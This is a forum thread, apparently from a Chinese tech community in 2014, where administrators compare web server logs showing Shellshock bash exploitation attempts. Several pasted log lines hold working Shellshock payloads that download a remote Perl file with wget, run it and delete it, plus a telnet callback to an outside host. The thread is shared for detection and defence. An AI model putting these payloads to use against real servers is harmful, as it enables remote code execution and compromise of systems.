1
20150517 2014-09-26 19:28:48 +08:00 via Android
中马了
|
2
LazyZhu 2014-09-26 19:33:11 +08:00
http://193.2.50.126/stuff/linux/dbot.txt
|
3
kingwkb 2014-09-26 20:16:46 +08:00
检查了下,的确有
54.251.83.67 - - [26/Sep/2014:13:42:09 +0800] "GET / HTTP/1.1" 200 2664 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a" 74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET / HTTP/1.0" 200 2664 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" 74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /test-cgi/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" 74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" 74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/php HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" |
4
xd547 2014-09-26 20:19:42 +08:00
貌似我的也被扫描了
$ sudo cat * |grep bash 209.126.230.72 - - [25/Sep/2014:14:10:39 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" 114.91.107.58 - - [26/Sep/2014:00:54:00 +0800] "GET / HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22" 198.46.135.194 - - [26/Sep/2014:03:15:06 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 3 198.46.158.94" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" |
5
janxin 2014-09-26 20:51:48 +08:00
看起来就是执行了个后门perl...
|
6
arcas 2014-09-26 20:53:25 +08:00
E486: 找不到模式: bash
|
7
binux 2014-09-26 20:56:48 +08:00
74.201.85.67 - - [26/Sep/2014:14:37:00 +0400] "GET /cgi-bin/test.sh HTTP/1.0" 500 192 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" "-"
也有,还是个相近的ip |
8
binux 2014-09-26 21:01:33 +08:00
还有人干这个。。
209.126.230.72 - - [25/Sep/2014:10:24:48 +0400] "GET / HTTP/1.0" 500 192 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-" |
9
fanta 2014-09-27 01:34:54 +08:00
那个服务器好像关了,wow1不能访问了.
|
10
chijiao 2014-09-27 10:17:27 +08:00
我的也被扫描了,我的解决方案是用squid做代理
|
11
sorcerer 2014-09-28 11:11:05 +08:00
我也被执行过这个脚本,能告诉我具体脚本做了啥吗.好有相应动作.
|